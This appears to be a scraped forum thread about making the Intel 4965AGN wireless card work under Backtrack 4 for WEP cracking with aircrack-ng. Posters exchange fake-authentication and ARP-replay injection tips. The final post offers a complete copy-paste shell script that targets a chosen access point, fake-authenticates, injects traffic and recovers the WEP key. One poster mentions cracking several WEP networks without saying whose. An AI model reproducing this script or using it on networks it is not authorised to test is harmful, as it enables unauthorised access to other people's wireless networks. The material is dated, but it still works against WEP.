4965 agn

[iceddevilz]

Sorry I'm very noob here, do I have to install compact-wireless or whatever to properly manual fakeauth without the fakeit.sh script?? If so how would I install it?

[riahc3]

Good to hear. Hope it is easy and includes easside-ng and wesside-ng

[cruisx]

does not work for me =/ when i try to fake auth it keeps asking to use this packet and never gives me a result =/. So i think for me the 4956 agn is not working. Any quick fixes guys...its a big thread to read through >_>

thanks =)

[silence420]

does not work for me =/ when i try to fake auth it keeps asking to use this packet and never gives me a result =/. So i think for me the 4956 agn is not working. Any quick fixes guys...its a big thread to read through >_>

Fakeauth shouldn't ask if you want to use any packet. How do you fake auth? Using wpa_supplicant or aireplay? Aireplay-ng (I use the latest version) only rarely works for me. I usually use wpa_supplicant (using a script from this forum) which always works.

[cruisx]

Fakeauth shouldn't ask if you want to use any packet. How do you fake auth? Using wpa_supplicant or aireplay? Aireplay-ng (I use the latest version) only rarely works for me. I usually use wpa_supplicant (using a script from this forum) which always works.

ahh i forget but i will get back to u on that. IT was something like -1 1 -a "XX:XX:XX:XX:XX:XX and so on. I think it was aireplay-ng. I am at work so i will get back to u when i get home. thanks.

Also when i activate the wifi card...is it supposed to identify my driver? cause it says something like unavaiable and beside it it says like thy0. Again sorry for the rather poor description, i kinda forgot what it looked since i have tried it since yesterday.

[cruisx]

OK, guys, looks like the Devs at aircrack have modified the suite so that now fakeauth WORKS with the 4965 as long as your using an aircrack version 1531 or greater.

VERIFIED, it works. Screenshot:


I suggest everyone with a 4965 or 5100 upgrade their version to the latest svn.

More details on the latter part of this thread:



Go thank Netroller3d at aircrack for his great work.

Ok back home guys, I took can confirm that this works and now backtrack can see my 4965agn and i can use it. Now only problem is that under the #Data coloumn i had around 42 000 and when i tried to use aircrack-ng to get the WEP key on my own router it said failed? Shoudl i wait till the number gets around 100 000? thanks again to anyone that can help.

EDIT: Ok so i got fed up and tried to fix this issue my self. Turns out that it as a fakeauth issue, i used the script pasted on page 4 and then i was able to crack my access point with around 50 000 packets. Actually by the time i figured out to get the pass with aircrack i had around 120 000 packets. For some reason when i tried to do

aircrack-ng NAME-01

no dile showd up so i had to do

aircrack-ng NAME-01.cap.ivs

and then i found my key....

I will post a mini tut later i guess, first i gotta figure out how to put backtrack on usb....re downloading aircrak and making a new script everytime for live cd is a pain.

[tripkip]

Ok back home guys, I took can confirm that this works and now backtrack can see my 4965agn and i can use it. Now only problem is that under the #Data coloumn i had around 42 000 and when i tried to use aircrack-ng to get the WEP key on my own router it said failed? Shoudl i wait till the number gets around 100 000? thanks again to anyone that can help.

EDIT: Ok so i got fed up and tried to fix this issue my self. Turns out that it as a fakeauth issue, i used the script pasted on page 4 and then i was able to crack my access point with around 50 000 packets. Actually by the time i figured out to get the pass with aircrack i had around 120 000 packets. For some reason when i tried to do

aircrack-ng NAME-01

no dile showd up so i had to do

aircrack-ng NAME-01.cap.ivs

and then i found my key....

I will post a mini tut later i guess, first i gotta figure out how to put backtrack on usb....re downloading aircrak and making a new script everytime for live cd is a pain.

I'm really looking forward to your mini tutorial, it's time that there is a universal method to get the 4965 working with backtrack.
Google will give you a bunch of sites with how to backtrack->usb.

I'm going to put mine on usb too this afternoon.
Any progress on the tutorial?

Kind regards, dr. ferre.

[tripkip]

intel 4965agn works same as Dr greens modified usb live, like a charm

Modified usb version for 4965agn ?? where can i get it?

greets

[zouzou0]

Many people (including me) had problems with this wireles adaptrer set(old kernel).

Last night Ive downloaded BT4 BETA and with great happines can confirm that IT WORKS.


MSI GX700 laptop.

Already craked couple of WEPs.

I tried everything to get mine working on bt4 beta
im getting iv's but very slow and when i try to fakeauth it says success but then with the aireplay -3 attack it keep on reading and 0 arps and 0 ACKS !!!

Can u post the way u followed to make ur card working!!!

[alacrityathome]

Nice script. Adapted it to Ubuntu 9.04 and it works very well!

Ok, I have written a really stupid script that should cover all the WEP cracking needs. It is my first script so therefore I am open to criticism. It only asks for the BSSID, ESSID and the channel of the target AP. It does not handle bad input or anything particular. Lets see what you guys think.

Code:

#!/bin/sh
#Aircrack-ng script by David Barchiesi
#Created for use under Backtrack 4 beta with an Intel 4965AGN wireless card.

#REMOVE ANY OLD CONFIGURATION AND PREPARING SYSTEM
rm auth.conf
rm aircrack.conf
mkdir WEP
killall NetworkManager
killall knetworkmanager
killall wpa_supplicant
clear

#AP BSSID, ESSID AND CHANNEL INPUT
echo "Aircrack-ng script by David Barchiesi"
echo "For use with Backtrack 4 beta and Intel 4965AGN"
echo ""
echo "Enter the ESSID of the Target Network: "
read targetname
echo "Enter the channel the Target Network is on: "
read channel
echo "Enter the BSSID of the Target Network: "
read targetmac
echo 'network={ \n ssid="'$targetname'" \n key_mgmt=NONE \n wep_key0="fakeauth" \n }' > auth.conf
clear

#STARTING AIRMON-NG TO SET CARD TO MONITOR MODE
echo "Setting card to Monitor mode"
airmon-ng start wlan0 $channel
sleep 2
clear

#STARTING AIRODUMP-NG IN ANOTHER KONSOLE WINDOW
echo "Done. Starting airodump-ng in new window"
konsole -e airodump-ng --channel $channel --bssid $targetmac --write /root/WEP/$targetname mon0 &
echo "Press enter when ready to do a Fake Authentication"
read enter

#FAKE AUTHENTICATION VIA WPA_SUPPLICANT
echo "Starting Fake Authentication..."
wpa_supplicant -c auth.conf -i wlan0 -Dwext -B
echo "Fake Authentication succesful. Check airodump-ng screen to make sure."
echo ""
echo "Press enter to start Injecting"
read enter
clear

#STARTING INJECTION IN A NEW KONSOLE WINDOW
konsole -e aireplay-ng -3 -b $targetmac mon0 &
echo "Injection started"
echo "Make sure #DATA is increasing under airodump-ng."
echo "If not then either the card is not injecting or the AP is too far away."
echo ""
echo "When you have enough IVs press enter."
read enter
clear

#REMOVING mon0
killall wpa_supplicant
clear
echo "Stopping mon0..."
airmon-ng stop mon0
sleep 2
clear

#DECRYPTING KEY VIA AIRCRACK-NG
echo "About to start aircrack-ng to decrypt password"
sleep 2
aircrack-ng /root/WEP/$targetname-01.cap

As usual copy/paste, make executable then ./<filename> in a terminal.
Good luck, hope it helps...